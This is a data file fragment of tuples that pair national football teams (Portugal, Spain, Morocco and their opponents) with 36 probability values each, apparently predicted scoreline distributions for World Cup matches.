('POR', 'GER',0.00171135723525433,0.00199990598905421,0.00156903395032107,0.000842486264601532,0.000342934450434621,0.004457027576712,0.00737560695375558,0.00610267459646489,0.0033662890357224,0.0154453303357598,0.0255593405844532,0.0211481359385227,0.0401430479857042,0.0664297760721338,0.0695556204389536,0.0602593048785271,0.115102477817915,0.0549648739996696,0.0116654979731436,0.00139265600183595,0.000112278146813809,0.0997186892925659,0.0952373102001977,0.0825085604146314,0.0303191084122579,0.0525337387814076,0.0455124483350143,0.0048260935392962,0.0125432153485848,0.0217335546165034,0.0188288003969346,0.000491649326032829,0.00173161561837874,0.00462344119856976,0.00844864206748185,0.0113875452894874),
('POR', 'MEX',0.00909052394983373,0.00636248454538902,0.00316540803399468,0.00107314836881419,0.000275312222688654,0.0174825746334997,0.0181837352919428,0.00945650844052075,0.00327859120435189,0.0456961128896899,0.0475288130081629,0.0247175079357198,0.0895806872129428,0.0931734334157625,0.117073408277485,0.0765018853512796,0.121768784659676,0.0484551356133559,0.00856961156660124,0.000852520807721737,5.67584397089016e-05,0.0795700897450571,0.0633262375105303,0.0413806741687742,0.0167994966035137,0.0219553386551294,0.0143467660620439,0.00222832665594997,0.00436831538946839,0.00570897128596893,0.00373054029278598,0.000187118651362098,0.000495727420343292,0.000993812507953647,0.00135766644538273,0.00120294221375828),
('POR', 'SWE',0.00806938365170675,0.00612671838315156,0.00331226010152405,0.00122230514760578,0.000341565566973883,0.0154577981303684,0.0175313888721598,0.00994157101790165,0.0037583952997941,0.0408800976652917,0.0463639700336171,0.0262917390129332,0.0810844324833326,0.0919615268199789,0.107219006584814,0.0708885480292253,0.121601930823006,0.0521488660403467,0.00993955061545977,0.00106564157747895,7.67293581764254e-05,0.0803979125359111,0.0689571282689788,0.0455914567291402,0.0197147968528016,0.026069133973569,0.0172357785678961,0.00281822361736955,0.00558986097578602,0.00739154634761973,0.00488696925072704,0.000256122113546374,0.000687267216901704,0.00139650795691753,0.00193695661528297,0.00178216368935438),
('POR', 'KOR',0.028599901802449,0.0142987989526116,0.00554730025362156,0.00146671833821359,0.000293474627144742,0.0390270176660177,0.0316618580149871,0.0128433238422173,0.00347317935327712,0.0790982843182558,0.064170894859188,0.0260302975122721,0.120234755746007,0.097544111555608,0.121843321161774,0.061736703416659,0.0988491092942952,0.0395678173093013,0.00703929084012538,0.000704430661888608,4.71894966997763e-05,0.0500857829983165,0.0400971769117411,0.0203168092862368,0.0107001994048591,0.0108433524440754,0.00549421033093285,0.0014277098304921,0.00217021575404476,0.00219925007099455,0.00111433641234866,0.000120637769477469,0.000247840456523748,0.000385318526500577,0.000408272865277686,0.000269408126850538),
('POR', 'BEL',0.00554095027350967,0.0054286185187278,0.00384258138233734,0.00186956385341311,0.000690814176448514,0.0100881774617491,0.0151963670314455,0.0114455545528421,0.00574701917245564,0.0272669842669674,0.0410737323300064,0.0309357916335617,0.0552742381243366,0.0832625727596293,0.0746994086404376,0.0504756088964912,0.112523757144059,0.0627114570711758,0.0155334183950942,0.00216426140927164,0.000205502751913743,0.0760341381617394,0.084750308953322,0.0572671661856897,0.0314885525604508,0.0425546571970456,0.0287548760090123,0.00584970694855153,0.0118582272122969,0.0160255951115953,0.0108287560224207,0.000703157648663641,0.00193697149922411,0.00405226152338035,0.00582713633864904,0.00608421286983678),
('POR', 'TUN',0.0273184014827874,0.0133831425218864,0.00503715215127074,0.00129072439742821,0.000250178320258614,0.038650712193307,0.0303549941287441,0.0119199054334069,0.00312050014875627,0.0797123505433803,0.0626034501157706,0.024583342102457,0.123297705305629,0.0968339497063164,0.127143192826065,0.0655543079327197,0.0998540687282162,0.0380250945971876,0.00643564859773538,0.000612684465039718,3.89600977056772e-05,0.0514841905747904,0.0392110455147201,0.0202169923131653,0.00995455157005228,0.0102650204773144,0.0052925862434972,0.00126358651828896,0.00195449409154447,0.00201545210061016,0.00103915565348269,0.000101304899079386,0.000211638693165764,0.00033444707125666,0.000359816609417901,0.000239137822655625),
('POR', 'PAN',0.0545133822472797,0.0196511261896881,0.00580949193612547,0.00116732350956835,0.000177302520025436,0.0622973768804003,0.0382999674938722,0.0117732686630436,0.00241270622547972,0.109274026212107,0.0671808647719317,0.0206511499024666,0.14375580565208,0.0883800082642369,0.126078949560958,0.0552878593330207,0.0775124076109447,0.0271676883773688,0.0042320581784902,0.000370828494855972,2.16293025212665e-05,0.0339905678424588,0.0238270280430135,0.0104485751138746,0.0055674980972553,0.00488289365845465,0.00214123561995744,0.000650459532909105,0.000855714184228198,0.000750491745237853,0.000329103963713167,4.78003136649683e-05,8.48443464011162e-05,0.000113837583355276,0.000103812774217925,5.64465172979058e-05),
('POR', 'ENG',0.00161650675162393,0.00153088248059173,0.000932758268472279,0.000385938682200153,0.000120664985797459,0.00511316683313471,0.00646725139751693,0.00408996440010964,0.00172436044990064,0.0193352599484716,0.0244556829463835,0.0154660560542737,0.054836702401187,0.0693587265608303,0.103681527539158,0.0980170094310817,0.131138788495823,0.043863258907741,0.0065206081928784,0.000545252721717178,3.02948552042696e-05,0.12397417528326,0.0829336828667822,0.0784026988089817,0.01849308733891,0.0349654785983584,0.0330551808685806,0.00206185392655181,0.00584762089914276,0.0110562860410057,0.0104522388787598,0.000144281652237005,0.000551795292829623,0.00159462522630591,0.00312940099641603,0.00410582571582995),
('POR', 'POL',0.0174733178695328,0.0128712374551839,0.00740471264059197,0.00293070701681642,0.000881263203470804,0.0230881676481391,0.0283192799418645,0.0173678056363717,0.00710094967673405,0.0493299721875236,0.060506719857237,0.0371078979526376,0.0790484825314188,0.0969585867489692,0.0844471398546679,0.0451072506470912,0.103580423976473,0.0594633017820479,0.0151718254734056,0.00217745497188397,0.000213382374927207,0.0553272515147292,0.0635243789760678,0.0339314047770667,0.0243119898050047,0.0259723898228213,0.0138730938627189,0.00465233078863574,0.0074550962177284,0.0079642459003345,0.00425408411296951,0.000577377410212076,0.00125800019033968,0.00208243120630372,0.00237157524177841,0.00186684513438044),
('POR', 'SEN',0.0187151232389464,0.0097474523399593,0.00374313952178017,0.000976998128550288,0.000192764189987467,0.0308577056314564,0.024643805698419,0.00984060782993416,0.00261965930770112,0.0702233001688047,0.0560822436227284,0.0223944050065896,0.119856089079361,0.0957203431234091,0.136379065589033,0.0775899233564286,0.108916043008783,0.0382224389183784,0.00596159429679594,0.000523032850741421,3.05467558795203e-05,0.0619654299055156,0.0434916619110674,0.0247436415534056,0.0101751608849793,0.0115778759708464,0.00658698243259154,0.00119027296826368,0.00203154028036326,0.00231160191585237,0.0013151359756492,8.75846732881739e-05,0.00020169598121285,0.000351108452798948,0.00041543027846304,0.000302707042761135),
('POR', 'COL',0.00251602919552018,0.00219423766940395,0.00125542875828498,0.000488014830420653,0.000143375358932549,0.00711819640843421,0.00846272169899668,0.00503060427426608,0.00199360444266723,0.0246479741022135,0.029303623179596,0.017419328823756,0.064010873592594,0.0761016102733443,0.110824306048993,0.095937034771714,0.131757429236681,0.0452380569202701,0.00690319680062445,0.000592541937877185,3.38286399985709e-05,0.114058165764855,0.0783222597007933,0.0678010593541855,0.0179276258550551,0.0310387373735569,0.0268692359360284,0.00205177793660865,0.00532847436449291,0.00922537751169047,0.00798611238521963,0.000147559060270539,0.000516910965684768,0.00136856730566773,0.00246177930788467,0.00292340001110729),
('POR', 'JPN',0.0328623186330125,0.0190117339430381,0.00897968707715791,0.00291143945435327,0.000716499528732472,0.0372699247896848,0.0373595846125088,0.0187247300644607,0.00625659197630241,0.0701250794178791,0.0702937785025058,0.0352314417122751,0.0989576741390061,0.099195735460043,0.0930967099768207,0.0437914365101877,0.0933206716448177,0.0497171847412099,0.0117720658600552,0.00156791084663865,0.000141917606570497,0.0438967850575988,0.0467725860473919,0.02200119352039,0.0166122629306462,0.0156283687704768,0.00735137384490317,0.00295009644535478,0.00416305671439464,0.00391649143867951,0.00184226473977791,0.00033784250608288,0.00064729838706745,0.000941361311280068,0.000939756312440745,0.000618513500351691),
('ESP', 'MAR',0.0199399490093339,0.0104585866991893,0.00408107767753191,0.00108318465427291,0.000217387340489475,0.0317678217748958,0.0258182619232674,0.0104914755166689,0.00284220161279632,0.0709058014298666,0.0576263794907761,0.0234169810244622,0.118696350477782,0.0964665908694141,0.132465170527971,0.0739155893688947,0.107656750677948,0.0392000390766386,0.0063437960779495,0.000577476685353801,3.5045918486927e-05,0.0600724865576675,0.0437472579408581,0.0244109779278832,0.0106195181133755,0.0118513860969674,0.00661307560851022,0.0012889283839546,0.00215766682157822,0.00240795696171301,0.0013436404248041,9.85843904273965e-05,0.000222766720129506,0.000380624359382163,0.000442352641453501,0.000318155895336704),
('ESP', 'IRN',0.00933371370473771,0.00405771559133479,0.0011873029108712,0.000234337920967509,3.48530390230494e-05,0.0222892968467857,0.0133551581459822,0.00400102906633227,0.000799103657910213,0.0630071353029988,0.0377522118387596,0.0113100642638703,0.133580899603263,0.0800381479840813,0.188802497293961,0.133426197496447,0.113125471254193,0.0239783724759599,0.00225889729232669,0.00011970045308947,4.15680759516608e-06,0.0799454545664179,0.0338908977103148,0.0239506027517624,0.00478906922159358,0.00676884368525713,0.00478352292642363,0.000338367903459732,0.000717370956855258,0.00101392810306484,0.000716540158449771,1.47579724190858e-05,4.20159953364291e-05,9.0140436752908e-05,0.00013044449956161,0.00010931082919085),
('ESP', 'FRA',0.0072432437261691,0.00555080143057039,0.00299961068016359,0.00110571879321009,0.000308563160746049,0.0144740093655732,0.0163862742611659,0.00927559107432961,0.00350035191676986,0.0393271566327375,0.0445229485638338,0.02520259686366,0.0801415079480957,0.0907295757362456,0.10887576331666,0.0739562565098138,0.123260119089326,0.0513582544429445,0.00951076406154165,0.000990702110764407,6.92111169126759e-05,0.083727146493452,0.0697724474901109,0.0473944693171816,0.0193811869174395,0.0263301948471662,0.0178853638748491,0.00269182478070563,0.00548544353390202,0.00745221630058196,0.00506208180317871,0.00023728984463812,0.000653905282792619,0.00136417511692034,0.0019413149601507,0.00182809295134482),
('ESP', 'AUS',0.107824357439628,0.0370775410143733,0.0120560655810844,0.00268475820340481,0.000453363626081519,0.0801602785781828,0.0550547030560333,0.0189059992202482,0.00432826245745962,0.112323620041443,0.0771447362365261,0.0264918025558977,0.118044084704395,0.0810735958780774,0.0827039224018186,0.028971967539816,0.0568016974262437,0.0278409882420694,0.00606492537619071,0.000743171083517392,6.15867151954104e-05,0.0198981727377346,0.0195059238836754,0.00683310993215406,0.00637380245195746,0.00446560676641501,0.00156434435665065,0.0010413594849147,0.00109439427966834,0.000766753368534653,0.000268600969084655,0.000109077145107417,0.000155410141821655,0.000167906252916536,0.000124239381703537,5.69199937320646e-05),
('ESP', 'PER',0.0223270205273504,0.0113996896942507,0.00437668143151083,0.00114320812494803,0.000225814698657108,0.0341694915468861,0.0273361730114132,0.0109347011190457,0.0029159821435853,0.0741925653660844,0.059355311161857,0.0237426280230186,0.120821305199572,0.0966590942059615,0.131170265898379,0.0712028339183687,0.104938438361923,0.0386644577182982,0.00633150175785988,0.000583208798014026,3.58320800021383e-05,0.0569634752751487,0.0419762656209391,0.0227858733764906,0.0103107407390945,0.0111939082442643,0.00607636177417907,0.00126632720915259,0.00206219188492285,0.00223882913226273,0.0012152981301388,9.80648313519836e-05,0.000215599355883579,0.000358449658897342,0.000405450035759984,0.000283406629756835),
('ESP', 'DEN',0.0290344980167587,0.0144804554198799,0.00561430681559612,0.00148363494686108,0.000296709103037851,0.039362107239088,0.0319191144136903,0.0129417596822982,0.00349819946973051,0.0794554598335483,0.0644312027761795,0.0261239435268634,0.120290246257918,0.0975445270202565,0.1214075858777,0.0612676520631899,0.0984505885516209,0.0395499013743987,0.0070613863675697,0.000709180967103795,4.76862074264568e-05,0.0496825331068947,0.0399172684148597,0.0201440239081782,0.0106904661662862,0.0107897666646485,0.00544499476761373,0.00143153666809984,0.00216725066715001,0.00218738160138398,0.0011038497628807,0.000121419594403637,0.000248452212629926,0.000384742235445367,0.000406082102885133,0.000266975317756494),
('ESP', 'ARG',0.00887325490608623,0.00646870797786132,0.0033673609348103,0.00119587035537073,0.000321528578274122,0.0167670166661322,0.0182900946850611,0.00997576283991578,0.0036273128871781,0.043667235042686,0.0476338682944594,0.0259804107871256,0.0852936804848296,0.0930415662588323,0.111067438756414,0.0723147124252886,0.121156554665169,0.0507466262605256,0.00944680425693814,0.00098920245443601,6.94861639709456e-05,0.0788836179815523,0.066081071566469,0.0430246140596102,0.0184521118203697,0.024027909077038,0.0156442910230217,0.00257623266814725,0.00503206502167433,0.00655263755106117,0.00426634579349,0.000228359794938215,0.000603231801145056,0.0012063959257377,0.00164595441277331,0.00147539496106908),
('ESP', 'ICE',0.0830516976334881,0.0318117517003479,0.0110112120890314,0.00260936571096585,0.000468827340056102,0.069851081189797,0.0510325691397367,0.0186419670865626,0.00453988427017916,0.105512377166673,0.0770863899475722,0.0281593101905115,0.119534961510965,0.0873311634411057,0.0902807639389194,0.0340930228042413,0.0659583108696982,0.0319016796909141,0.00685764591254685,0.000829199612797701,6.7757503110309e-05,0.0249080545899152,0.0240942731484147,0.0090987998778597,0.00776902636661507,0.00586768612775497,0.00221583367523369,0.00125253354424455,0.00141899512666611,0.00107171962446542,0.000404717018360331,0.000129347343441431,0.000198620521662605,0.000231243150871997,0.000184317222835838,9.15541013589265e-05),
('ESP', 'CRO',0.0199623883354643,0.0109215664701414,0.00447522712206017,0.00124883117615613,0.000263643330876314,0.0310090937427909,0.0265304654747575,0.0113493416503173,0.00323672059248721,0.0686272097151443,0.0587154153255404,0.0251175882799292,0.113910792242549,0.097458712139752,0.126049795148642,0.0697412007423463,0.107844484783396,0.0416913989664587,0.00716328908972345,0.000692310654438123,4.47211290201247e-05,0.0596685131726274,0.0461342792524223,0.0255253094751364,0.0118899768569892,0.013157042608872,0.00727956716374582,0.00153217468605317,0.00254317832630432,0.00281419434231082,0.00155704570819517,0.000124801516279482,0.000279840054010937,0.000474705536525184,0.000548399715907707,0.000396682647386852),
('ESP', 'NGA',0.0471322792463125,0.017969594469259,0.00552105243388719,0.001152963486779,0.000182004873406618,0.0569076034340944,0.0363619833765147,0.0116170226409656,0.00247429141663875,0.103648636875585,0.0662278814013528,0.0211586587490609,0.141585297190671,0.0904680905912412,0.128938157380262,0.058710363146777,0.0823870072246023,0.028902984905993,0.00450654951345074,0.000395246583633885,2.30757603546533e-05,0.0375138842605562,0.0263212190143556,0.0119850349826329,0.00615600138506693,0.00560611512049834,0.00255267378760819,0.00071988218008211,0.000983367803780573,0.000895528244544989,0.000407767487248739,5.29533684562969e-05,9.75970527796804e-05,0.000135973286796924,0.000128759883415132,7.30095980162421e-05),
('ESP', 'BRA',0.00256393418305742,0.00244914913353998,0.00156000928010717,0.00067708256981495,0.000222372737538896,0.0067496706914061,0.00898708736717649,0.00598308740070084,0.0026554643257887,0.0226438742105064,0.0301499858534256,0.0200721316173889,0.0569744506106883,0.0758606439847615,0.0955692767710698,0.0801542319815885,0.12724908802633,0.0505036665040096,0.00890858279059538,0.000883927934686835,5.86888393167835e-05,0.106724182349317,0.0847151456546039,0.0710508404643353,0.0224149633360224,0.0375989906337392,0.0315343834268986,0.00296541177774582,0.00746129859673664,0.0125156259168798,0.0104968920664684,0.000248328222127995,0.000844365941811808,0.00217250503739304,0.00380884568815877,0.00456982217254807),
('ESP', 'SWI',0.0218022245156336,0.0118046822934199,0.0048354139046116,0.00134957082630594,0.000285019746972168,0.0326108437068474,0.027920633922139,0.0119524935573871,0.00341114753191188,0.0704975610722446,0.0603583462236055,0.0258386950090034,0.114300311312353,0.0978612261009564,0.123546223608242,0.0667700253507889,0.105777357765943,0.0418932348653519,0.00737416006832417,0.000730135981370835,4.83708956382704e-05,0.057166918205182,0.0452820373183707,0.0244724823744534,0.0119559993091509,0.0129231368414366,0.00698425374174584,0.0015783954073818,0.00255911103439234,0.00276612111081088,0.00149493826114709,0.000131883436710182,0.000288952391123358,0.000479048596043836,0.000541147336749631,0.000383450354866858),
('ESP', 'CRC',0.0461831260914229,0.0156991404551113,0.0042238192296488,0.000770209961251412,0.000106042037283645,0.0593985897886327,0.0330432740533924,0.00919094177195892,0.00170429864221979,0.110569037880964,0.0615092552453127,0.0171087157550657,0.154366191791246,0.0858734929244534,0.143674465744411,0.0668616355285141,0.0799257147848289,0.023885595354385,0.0031725106909548,0.000237024175591077,1.1719136110703e-05,0.0371949461138475,0.0222312289479118,0.0103457237134292,0.00442916392477733,0.00412239074633239,0.00191843266066307,0.000441214768614751,0.000615982963209273,0.000573318691870266,0.000266804718701418,2.74525319591887e-05,5.16199782347033e-05,7.3285550079748e-05,7.05169056687203e-05,3.96602647726842e-05),
('ESP', 'SRB',0.0452994968374815,0.0210904384323029,0.0081166256364158,0.00213510680798586,0.000425550081005098,0.0498282521874554,0.0403421143240746,0.0163309580076585,0.0044073080768724,0.0888475219770149,0.0719330245725504,0.0291193266228278,0.118816361425228,0.0961964954771956,0.105929255186825,0.0472199576297285,0.0857627939052384,0.0389414624008562,0.00785856184050498,0.000892064835174803,6.82025213291472e-05,0.0382303782583017,0.0347177784147546,0.0154761026389895,0.0105093051910384,0.00936944085868436,0.0041766044666417,0.00159061870663144,0.00212714460607852,0.00189642942347103,0.000845369080204861,0.000153583073306639,0.00027810254168058,0.000381551833216944,0.000357813163334711,0.000210919188770998),
('ESP', 'GER',0.0062239117997511,0.00549937579542332,0.00346932740051532,0.00149899113344774,0.000491136105091931,0.0118690562303306,0.0158169792339302,0.0105390364335484,0.00468152134930177,0.0322226603660635,0.0429406635187718,0.0286118613808554,0.0656096715432204,0.0874329678961499,0.0890600786549343,0.0604461005783124,0.118683523552406,0.0582575990347196,0.012709609720235,0.00155967594491386,0.000129451515655196,0.0805518736338978,0.0790802061684133,0.0536726462406369,0.0258784752628733,0.0351280381104029,0.0238418038340971,0.00423428007069762,0.008621563877856,0.0117031092982165,0.00794303499842896,0.000444216242248042,0.00122626464865614,0.0025669830603577,0.00368030394033643,0.00366903406442709),
('ESP', 'MEX',0.027034889466121,0.0139786331972973,0.00559351053562174,0.00152614002125667,0.000315173008405489,0.0372258209715643,0.0311800571729322,0.0130580862951277,0.0036457837295442,0.0762274652311044,0.0638475300751348,0.026739096494526,0.117068468281689,0.0980556355482113,0.119860789670935,0.0613598568060672,0.100394462155377,0.041065317603833,0.00746548619293697,0.000763420000959601,5.23116142622193e-05,0.0513945372701799,0.0420448090619893,0.0215238316931236,0.011465329864184,0.011738801331646,0.0060093978252784,0.00156325824551539,0.00240081770758569,0.00245808209939818,0.00125835618178981,0.000135141533536705,0.000280591191119279,0.000440964814276957,0.000472524152260547,0.000317305772911592),
('ESP', 'SWE',0.0245400313422423,0.0137812397324885,0.00599183378261119,0.00177939719135823,0.000400260689078266,0.0336883281697594,0.0307682690106226,0.0140506583339425,0.00427758869695765,0.0697970518339074,0.0637471368763791,0.0291108102216552,0.108456594079627,0.0990557217859617,0.112352718730341,0.0581944026235571,0.102614135570938,0.0452348522549676,0.00886250806217499,0.000976703259668849,7.23878489701541e-05,0.0531501897574537,0.0468598398773206,0.024271601252848,0.0137713186183573,0.0142660305756811,0.00738925712295174,0.0020235794337413,0.00314440979191249,0.00325736753879896,0.0016871915534215,0.000189349504109633,0.000398212939154038,0.000634341985719714,0.000690197244433262,0.000479674222546745),
('ESP', 'KOR',0.0741434035216703,0.0265814084457578,0.00829418471911852,0.00176488712582302,0.000284268457084117,0.0703128753196698,0.0459368068359444,0.0150057170375207,0.00326784495657698,0.111642584812454,0.0729383321316197,0.0238260351239602,0.132949335597564,0.0868584582915495,0.105548289752974,0.0418973190791254,0.0689568073585847,0.0283731834494518,0.0051886749910302,0.000533737106673612,3.67999247309676e-05,0.0273723559836174,0.0225254302661734,0.00894145363667405,0.00617892262032445,0.00490543794115176,0.00194721012651455,0.000847466270273447,0.00100920341251031,0.000801205163790831,0.000318037823954808,7.37207340870332e-05,0.000118696767746755,0.000144662724384076,0.000120232507365231,6.06568566140949e-05),
('ESP', 'BEL',0.0182619338071534,0.0132640842029575,0.00754766130555131,0.0029545800972231,0.000878691354084324,0.0238523510902579,0.0289343124833274,0.0175495160983266,0.00709620029766599,0.0505066907343721,0.0612676027900652,0.0371606127531004,0.080209885787089,0.0972993350145486,0.0849211023256831,0.0449545186945644,0.103014319293812,0.059014923792581,0.0150260069737847,0.00215202765630942,0.000210421732596533,0.0545324897543275,0.0624812307479791,0.0330755675420612,0.0238628642201469,0.0252644759974109,0.0133742064979118,0.00455685877160467,0.00723676638290543,0.0076618258769382,0.00405592585572393,0.000564255832196467,0.00121835871732238,0.00199862591290394,0.00225546495889236,0.00175465454471103),
('ESP', 'TUN',0.0709581991620532,0.0249836852271818,0.00756351074113228,0.0015597817417804,0.000243375158152676,0.0699404429305642,0.0442339725331398,0.0139879320467351,0.00294889850099549,0.113002960038752,0.0714689473082141,0.0226003390866605,0.136934387771149,0.0866044264764635,0.110622627630457,0.0446833185697608,0.0699635013322318,0.0273865710702707,0.00476454316706514,0.00046625918363697,3.05137560710139e-05,0.0282600538899446,0.0221242779326167,0.00893656370459288,0.00577356381963394,0.00466418122515323,0.00188398250895677,0.000753336205613369,0.000912875486324709,0.000737467678063753,0.000297882123211759,6.21734922790315e-05,0.000101793925744766,0.000126098660935194,0.000106407578924195,5.41091675725077e-05),
('ESP', 'PAN',0.127730368913389,0.0322853704874154,0.00767781205334398,0.00124166340833966,0.000151822726371599,0.0992400636296025,0.0491326956420203,0.0121625364432521,0.00200718063332316,0.136372733278612,0.0675166838168954,0.0167133945475652,0.140549504668485,0.0695845587250663,0.0965694670659147,0.0331757197984841,0.047810511804694,0.0172252859388693,0.0027582077150999,0.000248433423832991,1.49115267219484e-05,0.016424944563192,0.0118352368946313,0.00406590731930792,0.00284268503541744,0.00195316646297699,0.000670995763612245,0.000341389795680894,0.000351845750453623,0.000241747964113116,8.30507091210979e-05,2.58226532655926e-05,3.59196451954273e-05,3.77771951749304e-05,2.70185529427391e-05,1.13071667614243e-05),
('ESP', 'ENG',0.00555599128759401,0.00400177375905852,0.00196147357546811,0.000653215157678852,0.000164412663467914,0.0129618288546246,0.0132023419214398,0.0067236589128555,0.00228280656292788,0.0383989776148778,0.0391114894040942,0.0199186110988263,0.0853167499589661,0.0868998439354015,0.126373986595249,0.0935946604603271,0.128718917655718,0.0442561564969901,0.00676273688629125,0.00058129128848835,3.3234194531809e-05,0.095331355110235,0.0655536800288077,0.0485501374889114,0.015025783700617,0.022256686862523,0.0164836696696247,0.00172205569327695,0.00382614861448287,0.00566741764015441,0.00419738305333372,0.000124026173645048,0.000371716992623397,0.000842008941175214,0.0012958801993096,0.00127612264022693),
('ESP', 'POL',0.0501939556364019,0.0267256350053529,0.0123593239775573,0.00393561842585459,0.000952485761884599,0.046382783970932,0.0458146596562129,0.0226267470353876,0.00744986699665093,0.0776374999409872,0.0766865490132007,0.0378736229529808,0.0974647414576967,0.0962709345166422,0.0815703393732513,0.0341339861264361,0.0805712166559328,0.0475458750215344,0.012469907991623,0.00183965413303735,0.000185653997606026,0.0337158924758077,0.0397921658981478,0.0166514599441966,0.0156545014886958,0.0131015891496129,0.00548250093972027,0.00307929225927088,0.00386568892803926,0.00323527824581001,0.00135383699033441,0.000393695892148878,0.0006723846141038,0.000872774179652485,0.000780077221822179,0.000462863519305769),
('ESP', 'SEN',0.050606245098258,0.0191785665100506,0.00592435992500018,0.0012445494843052,0.000197675949887614,0.0588688786849404,0.0378603671320875,0.0121745770549485,0.00260994698316523,0.104953443848732,0.0674987532403334,0.0217052510233301,0.140335933286514,0.0902543088086838,0.125097843063838,0.0557571748472792,0.0804542293250909,0.0290226461169516,0.00465310245863189,0.000419634079947226,2.5220295093475e-05,0.0358591357118206,0.0258712814616284,0.0115310506452383,0.00622178227091849,0.00554620277128641,0.00247198984477514,0.000748137943691157,0.00100035437337601,0.00089173294022509,0.000397452971589896,5.666355662396e-05,0.000102261500657348,0.000139537656263103,0.000129484006159677,7.2131797246022e-05),
('ESP', 'COL',0.00834316640982185,0.00550195963680819,0.00253230773307173,0.000792274699233305,0.000187382730484694,0.0173074241361325,0.0165701882302823,0.00793217800139792,0.00253143162775,0.0469501544174934,0.0449502415853162,0.0215177590323904,0.0955218833759563,0.0914529842916515,0.129561948082966,0.0878662448738868,0.124043060962194,0.043778703058708,0.00686705918138709,0.000605900367292911,3.55958476176866e-05,0.0841234492895333,0.0593796295923917,0.0402700418717441,0.0139712943311608,0.0189500881558343,0.0128515595120261,0.00164363660255078,0.00334404147993196,0.00453572012294814,0.00307603197465949,0.000121665981863512,0.000334006556240906,0.00069316286470422,0.000977858035545306,0.000874357865745109),
('ESP', 'JPN',0.0857136007259066,0.0352152448561921,0.0133722570093765,0.00348847048272524,0.000690992952619552,0.0668192838204767,0.0539386723058572,0.0217705144665668,0.00585795286730393,0.0984940493213027,0.0795075604924491,0.0320905284076549,0.108887852394951,0.0878977722089854,0.0802523230651002,0.0295737091681489,0.0647822530876288,0.0354769526139582,0.00863483512011674,0.00118218193172191,0.000110179052441029,0.0238728480235621,0.0261471578318376,0.0096354648907195,0.00954604525342278,0.0070356085717719,0.00259268559183929,0.00174257907047619,0.00192646859297624,0.00141984231021042,0.000523224773353083,0.000205551305098765,0.000308694074860539,0.000352001550524981,0.000275751062492052,0.000137942662765669),
('MAR', 'IRN',0.000963578644184033,0.000630003520444778,0.0002479415493868,6.56763540610966e-05,1.30978588347333e-05,0.0043126502014478,0.00346025473335924,0.0013881676301634,0.00037126541597372,0.0200748599311826,0.0161070631406829,0.00646175076457087,0.0700845157441665,0.0562323086758878,0.163117430256294,0.189822928580566,0.130877264274356,0.0225589954174972,0.00172819516418526,7.44711982741132e-05,2.09372134594564e-06,0.152304419890236,0.0525046841316293,0.0611007228988569,0.00603340305280025,0.01404237713885,0.0163413876036491,0.000346654331890462,0.00121022518037212,0.00281672519753683,0.00327787793838472,1.22296053125278e-05,5.72576219994541e-05,0.000201829999086838,0.000478841210000613,0.000676808922714561),
('MAR', 'FRA',0.000621746858373215,0.000726108714098152,0.00053001841360052,0.000262788056901031,9.8463814289748e-05,0.00239054007664447,0.00362408662187475,0.00274707878173023,0.00138820115161019,0.0106958339269675,0.0162150089108428,0.0122910712607361,0.0358917419470277,0.0544122991690589,0.0802940128395249,0.089813535762475,0.121726659423681,0.0412448399026277,0.0062111357679848,0.000526132281902949,2.96274230201762e-05,0.136158367140591,0.092269517305498,0.103208835867577,0.0208425526896405,0.0466272212627747,0.0521552660814035,0.00235403855632047,0.00789938820794342,0.017671852737856,0.019766997833733,0.000166969761530303,0.000755662666712785,0.00258448771532264,0.00600407812396088,0.00978930147226451),
('MAR', 'AUS',0.0162441485197603,0.00966203972873825,0.00425019310655214,0.00127406374678141,0.000289011914977006,0.0264993385827475,0.0243714523959924,0.0112072173053562,0.00343576076054539,0.0611451242275942,0.0562351954448421,0.0258597659802647,0.105815647203796,0.0973186934657089,0.122080611055549,0.070422834380025,0.112277587288576,0.0447520208406988,0.00792774573840174,0.000789967639741074,5.26844961618439e-05,0.0647679092187246,0.0516308711856291,0.0297835361321015,0.0137194838799189,0.0158283110266434,0.00913064340280566,0.00182278773928324,0.00315445371620253,0.00363932601081928,0.00209936410621525,0.00015333063383704,0.000358605977845435,0.000634670354165004,0.000765458327799355,0.000585967570380752),
('MAR', 'PER',0.00241609086549314,0.00193599454919557,0.00100299673218132,0.000352198664901954,9.33788645583032e-05,0.00730410022370803,0.00782486930124407,0.00419138413399729,0.00149674073626859,0.026115811118582,0.02797782101012,0.0149862944122261,0.0700328140522702,0.0750260264746401,0.125201167007219,0.111914196452751,0.134127782778064,0.0401876229361008,0.00535159666005156,0.000400863907957298,1.98729297806749e-05,0.119893475359784,0.0718454250187707,0.0642208311789817,0.014350975815929,0.0256559577701054,0.022933219926788,0.00143328894508991,0.0038435435805107,0.00687129523831329,0.00614207921193823,8.94202255830409e-05,0.00032296990069897,0.000880767001282123,0.00162799407330739,0.0019286174590887),
('MAR', 'DEN',0.00325552849777072,0.00258247348333511,0.00135205576440171,0.000480496141996003,0.000129009773728943,0.00885474785825815,0.00961523410778106,0.00522051719751752,0.0018896263647234,0.0294331353645384,0.0319609876629189,0.0173529717398029,0.0733766904988126,0.0796786163190721,0.121951866875531,0.101341841212285,0.132425651035969,0.0432608901775465,0.00628110810963794,0.000512979030117321,2.78125883830916e-05,0.110045542094225,0.0718994858446841,0.0597483783102208,0.0156587777700968,0.0260248475240687,0.0216266141136646,0.00170513960129666,0.00425090630787359,0.00706499511812332,0.00587100166459264,0.000116414376009059,0.000391253204163566,0.000993451357278806,0.00171226853233168,0.0019058585519478),
('MAR', 'ARG',0.000787672883651322,0.000879732195623476,0.000618617942038688,0.000295503159185364,0.000106678160566109,0.0028794596899681,0.00420612651253911,0.00307201734775463,0.00149580071779762,0.0123488303560309,0.018038364259902,0.0131746317583026,0.0397193295568549,0.0580194005463629,0.0851700171844249,0.0913148825537429,0.124410794358711,0.0423754740741632,0.00641488032455029,0.00054624198061558,3.09274346408596e-05,0.133386812059504,0.0908655784314909,0.0974213684222064,0.0206331076168814,0.0442434993214681,0.0474355891646489,0.00234260947477922,0.00753487375477018,0.0161570030092689,0.0173227020609509,0.000167071232631937,0.000724793758155338,0.00237629845923801,0.00529242995528112,0.0081875656899497),
